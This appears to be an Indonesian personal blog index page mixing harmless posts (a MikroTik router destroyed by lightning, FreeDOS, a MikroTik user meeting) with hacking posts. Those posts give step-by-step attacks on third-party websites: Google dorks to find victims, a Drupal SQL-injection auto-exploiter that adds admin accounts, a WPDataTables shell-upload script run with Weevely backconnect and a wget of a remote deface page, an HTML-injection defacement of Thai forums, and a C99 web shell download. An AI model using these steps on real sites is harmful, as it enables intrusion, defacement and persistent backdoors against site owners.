Selasa, 10 Februari 2015

Mikrotik Tersambar Petir

Sedikit sharing tentang sambaran petir di Mikrotik. Beberapa waktu lalu terjadi keanehan di jaringan yang saya kelola, dimana jaringan internet maupun intranet di salah satu Gardu Induk (GI) down. Kejadian ini segera saya laporkan ke pihak ISP untuk mengecek link Fiber Optic (FO) dari kantor ke Gardu Induk tersebut. Karena belakangan ini sering sekali terjadi gangguan link Fiber Optic di kantor, saya pikir ini hanya masalah link FO yang down.

Keesokan harinya pihak ISP melakukan pengecekan link FO E1, dan ternyata hasilnya tidak ada masalah di link FO tersebut. Menurut info orang yang di GI, Router Mikrotik RB 1200 nya juga masih menyala. Namun setelah dilakukan pengecekan kondisi jaringan di GI tersebut masih down. Beberapa saat kemudian saya hubungi Supervisor GI tersebut, dan beliau menginformasikan bahwa pada hari sebelumnya ada hujan lebat disertai petir dan ruang kerja nya terkena sambaran petir.

Pada saat itu ada 2 orang di ruang kerja yang sedang menggunakan PC, tiba-tiba ada sambaran petir yang menuju ruang tersebut dan menghantam Switch. Kedua PC tersebut mati seketika. Alhamdulillah hanya PC nya saja yang mati, tidak termasuk orang nya :D. 

Arus dan tegangan tinggi surja petir yang menghantam Switch lari ke semua jalur yang ada pada switch dan juga masuk ke jaringan listrik gedung. Hal ini mengakibatkan hampir semua perangkat yang terhubung ke switch tersebut kena getah nya. Ada 3 PC, 1 Switch dan 1 Router Mikrotik RB 1200 yang kena hantam. Selain itu juga semua lampu di gedung itu jebol dan beberapa saklar lampu sampai terlempar keluar. Beruntung 1 PC masih selamat karena hanya port ethernet nya saja yang gosong. Sementara 2 PC lainnya wafat alias co.id :(.

Ternyata hal inilah yang menyebabkan koneksi jaringan down. Karena setelah saya cek ke TKP, Router Mikrotik nya masih nyala, tetapi port ethernet banyak yang ngaco. Dimana LED port 1 - 5 nyala semua walaupun tidak ada kabel yang terhubung. Dari 10 port ethernet pada Mikrotik, hanya 2 port yang sehat, selebihnya jebol semua. Beruntung perangkat Multiplexer di GI tersebut tidak ikut kena.



Untuk mengatasi hal ini, saya terpaksa mengganti Router Mikrotik RB 1200 dengan Mikrotik RB450G yang hanya punya 5 port ethernet. Tapi itu ga masalah, karena emang 5 port saja yang digunakan. Alhamdulillah setelah penggantian dan sedikit seting, jaringan di GI tersebut bisa up lagi :).


Saya coba bongkar Mikrotik RB 1200 yang tersambar petir itu untuk memeriksa kerusakan nya, siapa tau masih bisa diperbaiki. Ternyata efek dari sambaran petir di Mikrotik ini tidak hanya membuat port ethernet nya jebol. Tetapi juga membuat sistem mikrotik nya error. 

Setelah saya coba bongkar dan nyalakan, ternyata mikrotik nya boot looping (boot dan restart terus). Kemungkinan ada komponen elektronik di Routerboard nya yang rusak. Karena walaupun port ether nya punya fitur Over Voltage Protection, tetap saja tidak mampu menahan besarnya tegangan surja petir. Hal ini terlihat dari gosong nya salah satu port ether di Routerboard nya seperti gambar berikut.


Ya sudah lah, di hard reset pun sudah tidak mempan. Mikrotik nya sudah tidak bisa diperbaiki dan digunakan lagi. Beginilah nasib Mikrotik yang kesamber petir, ujung-ujung nya minta diganti yang baru :D.

Oke, cukup sekian curhatan saya tentang Mikrotik yang tersambar petir. Semoga pengalaman ini tidak terjadi pada anda semua. Kalaupun kejadian ya ga masalah, ambil sisi positifnya saja jadi bisa ganti Mikrotik baru :D. 
Read more

Minggu, 25 Januari 2015

FreeDOS: A free DOS-Compatible Operating System






Description:
FreeDOS is a free DOS-compatible operating system for IBM-PC compatible systems. FreeDOS is made of up many different, separate programs that act as packages to the overall FreeDOS Project. FreeDOS is distributed under the GNU GPL.



Read more

Kamis, 22 Januari 2015

Drupal 7.xx SQL Injection Exploit

Drupal 7.xx SQL Injection Vulnerability
This exploit add a new Drupal administrator account (preserving original) via Sql Injection.

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Requirements:-
1). Python
         OR

In this tutorial, i'm just going to show you how to exploit using our Drupal Auto Exploiter since it is fast and easy.

Steps:-
1). Download the auto exploiter from the given link
2). Extract and run it
3).  Find your target on Google by using this dork
intext:"powered by drupal"
4). Choose any site, paste it in exploiter and click EXPLOIT
5). If the site is vulnerable, you will see something like this

6). Click the given login URL and login with the username and password given.

Having Problems?
Feel free to read the Frequent Asked Questions(FAQs) by clicking on HELP


Downloads:-



Read more

Wordpress Exploit: WPDataTable Unauthenticated Shell Upload Vulnerability and Not Acceptable Bypass

Exploit Wordpress: WPDataTable Unauthenticated Shell Upload Vulnerability and Not Acceptable Bypass 

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.


Uploading Shell

Requirement:
    1-Python Any Version (v2.7 recommended)
    2-Exploit Script
    3-Backdoor

Steps:
    1- Download Exploit
        wget http://www.homelab.it/wp-content/uploads/2014/11/wpdatatables_shell_up.py_.txt
    2- Change to executable Python extension
        mv wpdatatables_shell_up.py_.txt wpdatatables_shell_up.py
    3- Find Vulnerable Target using dork
        inurl:/plugins/wpdatatables
        inurl:codecanyon-3958969
        index of "wpdatatables"
        index of "codecanyon-3958969"
    4- Open cmd/terminal and run exploit wptable.py
        python wpdatatables_shell_up.py -t targetsite.com -f shell.php
    5- Shell Upload to
        http://targetsite.com/wp-content/YEAR/MONTH/shell.php

Bypassing Not Acceptable:-

Requirements:
    1- Weevely Stealth Shell
    2- Remote Deface Script (.txt)


Steps:
    1- Upload weevely stealth shell using the exploit script

    2- Backconnect using weevely

    3- CD to root directory

    4- Backup index.php
        mv index.php indexBAK.php
    5- Import Deface Script
        wget http://yourhosting.com/index.txt -O index.php
Read more

How to Install Social Engineering Toolkit (S.E.T.) on Windows

Hello Readers! Today Im gonna tech you guyz can Install Social Engineering Toolkit (S.E.T.) on Windows ..

How to Install Social Engineering Toolkit (S.E.T.) on Windows:-

 How to Install?
  • Download and extract S.E.T anywhere you want.
  • Download and install PyCrypto library based on your python version
  • Done and you're ready to go! :)
How to Run the scripts?

1). Open up your cmd, and cd to the S.E.T directory
cd\
cd set
2). Finally type in your cmd as below
python setoolkit
Downloads:-

Read more

Chiangraientersoft HTML Injection Vulnerability





Hello Readers! today im gonna share a HTML Injection Vulnerability. This works most on Thailand web pages :). So lets start..

Chiangraientersoft HTML Injection Vulnerability:

1). Go to google and type any of the following dorks :-
inurl:Qread.php?id_ques=
inurl:webboard/Qread.php?id_ques=
Vulnerable at 'Qform.php' at Field Subject/Title
2). Pick any site!..and replace everything after yoursite.com/ with anyone of the following [Exploit] :
 /webboard/Qform.php
 /board/Qform.php
3). Just fill-up the forum and upload your deface page shell etc..
After your file is successfully uploaded, it would be listed at www.site.com/board/ or www.site.com/webboard/


Read more

Minggu, 21 Desember 2014

Download C99 Shell



Shells are backdoors used by hackers to keep their access on the server and one of the famous shell is c99 sell which is developed by third party coder and can be used freely for pentesting.

 Download :-
To download c99 shell please click here  


save it as c99.php and use it.


Read more

Rabu, 10 Desember 2014

Download Materi & Video MUM Indonesia - Yogyakarta 5-6 Desember 2014

Mikrotik User Meeting (MUM) Indonesia 2014 telah diselenggarakan pada 5-6 Desember 2014 lalu di Royal Ambarrukmo, Yogyakarta. Acara MUM Jogja kali ini adalah MUM terbesar di dunia dengan jumlah peserta terbanyak sepanjang sejarah penyelenggaraan MUM. Lebih dari 1900an peserta yang hadir di Ballroom Royal Ammbarrukmo, Yogyakarta. Mulai dari praktisi dan expert Mikrotik, praktisi IT, para siswa dan mahasiswa, sampai orang biasa yang baru mengenal Mikrotik turut hadir di acara MUM yogyakarta ini.


Acara diawali dengan pembukaan dan pengenalan produk terbaru Mikrotik oleh Normunds Rustanovics dari Mikrotik Latvia. Dilanjutkan dengan Workshop dan Presentasi oleh para expert Mikrotik dari berbagai perusahaan dan institusi di Indonesia. Materi yanng dibawakan para pembicara sangat beragam dan informatif yang dapat menambah pengetahuan para peserta MUM tentang Mikrotik dan penerapanya di perusahaan dan institusi terkait.

Di luar stage, terdapaat beberapa booth tentang Mikrotik yang tentu saja menampilkan beberapa produk Mikrotik terbaru dan ada juga yang memberikan souvenir menarik kepada pengunjung. Terdapat booth fotografi dimana para peserta dapat mengabadikan momen MUM ini dengan jepretan kamera. Yang tentu saja dicari banyak orang adalah free beverages alias snack gratis yang dapat ditemukan juga diluar stage.

Pada kesempatan kali ini, saya dan adik-adik angkatan saya mendapat kesempatan untuk beroto bersama bule-bule Mikrotik Latvia :D


Sungguh kesempatan yang luar biasa dapat menghadiri acara tahunan Mikrotik User Meeting (MUM) Indonesia di Yogyakarta ini. Bagi anda yang belum dapat hadir di MUM kali ini, anda tetap dapat melihat jalannya acara dan materi yang diberikan oleh para expert melalui Video dan file presentasi mereka di bawah ini :  


Download Materi MUM Indonesia 2014 disini

Download Video MUM Indonesia 2014 Day 1 (Download pakai IDM)


Download Video MUM Indonesia 2014 Day 2 (Download pakai IDM)

Read more